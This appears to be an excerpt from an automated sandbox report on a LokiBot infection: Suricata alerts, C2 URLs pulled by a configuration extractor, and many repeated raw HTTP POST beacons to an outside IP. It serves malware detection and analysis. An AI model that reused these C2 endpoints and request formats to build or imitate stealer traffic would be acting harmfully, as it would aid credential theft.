                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50054 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49800 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50010 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49800 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50010 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50073 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50079 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50079 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49991 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49800 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49991 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50116 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50116 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50079 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50079 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49898 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49898 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49783 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49898 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50010 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50010 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:50060
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49991 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50112 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50112 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50118 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50118 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49991 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:50038
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49898 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49898 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50073 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49910
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50073 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49783 -> 94.156.177.41:80
                    Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                    Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                    Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                    Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                    Source: Joe Sandbox ViewIP Address: 94.156.177.41 94.156.177.41
                    Source: Joe Sandbox ViewASN Name: NET1-ASBG NET1-ASBG
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 176Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 176Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
